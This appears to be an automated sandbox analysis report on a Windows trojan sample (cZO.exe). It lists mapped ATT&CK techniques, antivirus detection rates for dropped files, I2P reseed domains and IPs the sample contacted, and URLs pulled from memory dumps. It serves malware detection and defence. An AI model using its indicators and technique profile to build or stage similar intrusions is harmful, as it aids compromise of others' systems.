Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 21 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 21 Disable or Modify Tools | 1 Network Sniffing | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 3 Native API | 1 DLL Side-Loading | 2 Valid Accounts | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Create Account | 2 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 1 System Service Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 3 Service Execution | 2 Valid Accounts | 4 Windows Service | 1 Software Packing | NTDS | 3 File and Directory Discovery | Distributed Component Object Model | Input Capture | 1 Multi-hop Proxy | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | 4 Windows Service | 11 Process Injection | 1 Timestomp | LSA Secrets | 1 Network Sniffing | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | 1 Services File Permissions Weakness | 1 Services File Permissions Weakness | 1 DLL Side-Loading | Cached Domain Credentials | 44 System Information Discovery | VNC | GUI Input Capture | 4 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 File Deletion | DCSync | 1 Network Share Discovery | Windows Remote Management | Web Portal Capture | 2 Proxy | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Masquerading | Proc Filesystem | 141 Security Software Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 2 Valid Accounts | /etc/passwd and /etc/shadow | 41 Virtualization/Sandbox Evasion | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 2 Access Token Manipulation | Network Sniffing | 2 Process Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 41 Virtualization/Sandbox Evasion | Input Capture | 1 Application Window Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 11 Process Injection | Keylogging | 1 System Owner/User Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 1 Hidden Users | GUI Input Capture | 1 System Network Configuration Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
Business Relationships | Server | Trusted Relationship | Visual Basic | Container Orchestration Job | Container Orchestration Job | 1 Services File Permissions Weakness | Web Portal Capture | Local Groups | Component Object Model and Distributed COM | Local Email Collection | Internal Proxy | Commonly Used Port | Direct Network Flood
Behavior Graph (image not reproduced): Behavior Graph ID: 1584500, Sample: cZO.exe, Startdate: 05/01/2025, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label | Link
cZO.exe | 11% | ReversingLabs | Win64.Trojan.Generic
cZO.exe | 19% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | 100% | Avira | TR/AVI.Agent.jibab
C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe | 100% | Joe Sandbox ML
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll | 26% | ReversingLabs | Win64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll | 8% | ReversingLabs | Win64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll | 32% | ReversingLabs | Win64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll | 3% | ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | 70% | ReversingLabs | Win64.Trojan.Barys
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll | 8% | ReversingLabs | Win64.Trojan.Generic
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll | 3% | ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll | 0% | ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll | 3% | ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll | 70% | ReversingLabs | Win64.Trojan.Generic
C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe | 70% | ReversingLabs | Win64.Trojan.Barys
C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe | 58% | ReversingLabs | Win64.Trojan.Alevaul
C:\Windows\Temp\EgwqOk24 | 3% | ReversingLabs
C:\Windows\Temp\GEGgzh0s | 0% | ReversingLabs
C:\Windows\Temp\GmdNT1AN | 8% | ReversingLabs | Win64.Trojan.Generic
C:\Windows\Temp\I77yQ5in | 26% | ReversingLabs | Win64.Trojan.Generic
C:\Windows\Temp\OwuZZod2 | 3% | ReversingLabs
C:\Windows\Temp\XpOp833v | 3% | ReversingLabs
C:\Windows\Temp\YXkdIYk6 | 70% | ReversingLabs | Win64.Trojan.Generic
C:\Windows\Temp\YkhL6reh | 32% | ReversingLabs | Win64.Trojan.Generic
C:\Windows\Temp\o6oDuAJl | 8% | ReversingLabs | Win64.Trojan.Generic
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high
reseed.i2pgit.org | 68.183.196.133 | true | true | | unknown
reseed.memcpy.io | 95.216.2.172 | true | true | | unknown
reseed.onion.im | 159.223.194.171 | true | true | | unknown
reseed-pl.i2pd.xyz | 185.226.181.238 | true | true | | unknown
                                                    http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111952207.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111425069.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2004/09/policysrfsvchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/02/scnsvchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/02/trustsvchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://reseed.i2pgit.org/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://i2p.novg.net/:main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://login.microsoftonline.com/ppsecure/DeviceQuery.srfUsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://Passport.NET/STSsvchost.exe, 0000001F.00000003.3199473486.000001D37989B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D379382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D379382000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://reseed-pl.i2pd.xyz:443/i2pseeds.su3Tmain.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://reseed-pl.i2pd.xyz/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://stats.i2p/cgi-bin/newhosts.txtshdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://127.0.0.1:8118shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000003.2456738676.0000022350291000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2456860774.0000022350297000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://reseed.onion.im/main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://i2p.mooo.com/netDb/shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://reseed2.i2p.net/main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drtrue
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://Passport.NET/tbsvchost.exe, 0000001F.00000002.3263371493.000001D379800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3209006685.000001D379382000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reseed.stormycloud.org/??main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262754497.000001D378AD2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3036974940.000001D379352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 0000001F.00000003.3183713515.000001D379377000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://reseed.i2pgit.org/i2pseeds.su30main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://signup.live.com/signup.aspxsvchost.exe, 0000001F.00000003.3023799636.000001D379355000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://reseed.stormycloud.org/7main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2004/09/policysvchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 0000001F.00000002.3263129207.000001D379337000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAAsvchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reseed.i2p-projekt.de/shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://netdb.i2p2.no/shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://login.microsoftonline.com/ppsecure/devicechangecredential.srfTokensvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfUsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www2.mk16.de/Jmain.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://reseed-pl.i2pd.xyz/i2pseeds.su3main.exe, 00000016.00000003.2484244836.00000223506CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://reg.i2p/hosts.txt9main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://legit-website.com/i2pseeds.su3shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAsvchost.exe, 0000001F.00000003.3143580946.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143291121.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112272695.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183931947.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143546975.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263042958.000001D379310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156417903.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183773272.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184036782.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3130778572.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183958551.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
0000001F.00000003.3184178913.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143745371.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199403669.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://i2p.ghativega.in/b.cmain.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  • No. of IPs < 25%
                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                  • 75% < No. of IPs
IP  Domain  Country  Flag  ASN  ASN Name  Malicious
                                                                                                                  23.137.249.66
                                                                                                                  unknownReserved
                                                                                                                  397614GTLAKESUSfalse
                                                                                                                  95.216.2.172
                                                                                                                  reseed.memcpy.ioGermany
                                                                                                                  24940HETZNER-ASDEtrue
                                                                                                                  36.37.69.163
                                                                                                                  unknownIndonesia
                                                                                                                  4800LINTASARTA-AS-APNetworkAccessProviderandInternetServicfalse
                                                                                                                  139.59.231.96
                                                                                                                  unknownSingapore
                                                                                                                  14061DIGITALOCEAN-ASNUSfalse
                                                                                                                  144.76.102.56
                                                                                                                  unknownGermany
                                                                                                                  24940HETZNER-ASDEfalse
                                                                                                                  123.215.14.113
                                                                                                                  unknownKorea Republic of
                                                                                                                  9318SKB-ASSKBroadbandCoLtdKRfalse
                                                                                                                  78.191.208.199
                                                                                                                  unknownTurkey
                                                                                                                  9121TTNETTRtrue
                                                                                                                  118.136.159.58
                                                                                                                  unknownIndonesia
                                                                                                                  23700FASTNET-AS-IDLinknet-FastnetASNIDfalse
                                                                                                                  47.221.95.89
                                                                                                                  unknownUnited States
                                                                                                                  19108SUDDENLINK-COMMUNICATIONSUSfalse
                                                                                                                  148.135.95.231
                                                                                                                  unknownSweden
                                                                                                                  158ERI-ASUSfalse
                                                                                                                  78.57.19.55
                                                                                                                  unknownLithuania
                                                                                                                  8764TELIA-LIETUVALTfalse
                                                                                                                  185.148.3.164
                                                                                                                  unknownFinland
                                                                                                                  203003MAGNA-CAPAXFIfalse
                                                                                                                  188.174.152.142
                                                                                                                  unknownGermany
                                                                                                                  8767MNET-ASGermanyDEfalse
                                                                                                                  194.54.156.174
